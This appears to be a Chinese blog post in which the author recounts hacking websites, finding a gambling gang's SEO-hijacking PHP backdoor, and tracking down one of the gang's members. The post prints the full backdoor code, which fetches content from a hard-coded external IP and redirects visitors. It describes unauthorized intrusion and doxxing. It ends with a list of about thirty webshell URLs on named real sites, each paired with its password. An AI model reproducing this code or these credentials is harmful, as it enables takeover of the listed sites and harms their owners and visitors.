对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码
set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http:// 107.182.228.74/');
define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{$d=@iconv('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%3A@i",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d
看上去是针对360的,通过360去搜索site网站赌博相关的关键字出现的结果我惊呆了!!!!居然非常多的站被劫持,而且其中包括我渗透测试的不少站,看上去就像360自己控制的排名一样,其实是非法份子利用了360的算法漏洞。通过收录时间发现在2014年开始出现的,也就是说这个问题已经存在了多年之久,至今才暴露出来。
接下来我就开展了所有疑问的调查,因为这些东西被利用对社会影响实在太大,不仅仅我是唯一的受害者,而是这个安全圈子的所有人。
调查
找到幕后团伙
查大马问题
分析团伙的后门特征
1.我对我手里的shell进行了一遍梳理,首先是对后门进行新的地址修改,在原来的后门地址放上了js代码,该段代码记录的是相关指纹信息,以及各大网站的json获取。此时就是静静的等待。
2.我对大马又进行了一遍分析,把所有代码读烂了也没任何问题,同时也对马进行了抓包分析,没有任何外部请求。因为一直没发现问题,所以我特意进行了长达一周的数据包监控,还是没有任何结果。这时候就非常纳闷,既然马没有问题,为什么人家可以获取到我的所有后门?难道是我的电脑被入侵?我的网络环境除了http之外,不能做任何协议请求,而我的后门都 保存 在这台linux里,这点也可以排除。只好再想想是不是哪里疏忽了。
3.被该团队劫持过的站,我都检查了一遍,之后我发现,每个站的所有文件创建时间都会被他们更新到入侵时间,这刚好符合了特征,也就是刚被他们入侵过的站。
如图特征,几乎每个站被入侵后所有创建时间都会更新一次。
之后对他们自己的后门进行了采集样本,新的进展出现了,一共发现2波不同的团伙,但使用的大马均为一类。(见附件1)
我对他们的马进行了解密审计后发现,他们自己记录大马后门的箱子地址为api.fwqadmin.com,因为有了新的线索,所以只能暂时保存,后面再对这个进行渗透。
进展
经过两天的等待,终于得到了该团伙的指纹信息以及QQ号,然后我就开启大神模式进行社工,之后基本确认此人真实信息(圈内叫老袁)。然后我申请了一个QQ小号,以匿名的方式加了一些博彩导航网站上的qq,在QQ上问了好几个人,都没有结果,后来我干脆以做 博彩 的名义和他们进行深度沟通,通过沟通发现该团伙的shell都是收购来的, 一个月收入几百万人民币 ,是否真实就不得而知了。目前基本可以确认我的判断错误,老袁就是唯一的线索。
我对被该团伙做劫持的所有站进行了采集,还有跳转到他们导航的域名。首先对那些不是我的站进行了渗透入侵,采集到后门样本,看到里面有个和我类似的大马,但是核心变量结构不一样,我下载回来进行审计抓包同样没问题,后来通过对比特征,发现大马请求的POST参数都是一样的,例如gopwd=密码&godir= ,马都没异常,这时候初步判断是上层网络出现了问题,通过流量提取到大马特征的地址,如果真是这样就太可怕了。
我联系到老袁了,和他进行了一些盘问式的沟通,感觉到他很害怕, 他说别搞他,他以前做诈骗的。 后来发了一些shell地址给我来讨好我,如下列表,下面是星际团队的:
http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.212200.com/mocuz/downapp/images/pclife.php?1=2&Z=Opm Hys7sa5wrKKO00GSBtashras28asNNmsn18 http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw ytsadAskLs27ssJsjdasd2sS http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php UTF8 http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd ytsadAskLs27ssJsjdasd2sS http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS UUys78tasdRhasd00iasdyTGGgahs http://bbs.dqdaily.com/uc_server/install/images/close.php?1=2&sha=shan 7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google erk12hj3nfher71h3j4k132bnnebr3hg4134 http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK http://www.dibaichina.com/goldcard/data/alliance/images/GHMC.php?1=1&baidu=.com Tmbdcuu123uualltop http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd YIasdwj78954qwtyVVJsarwhahuyrwvsllps2 http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qkos http://www.hotpoll.com.cn/i/index.php?v=111 heiheideheihei
发表评论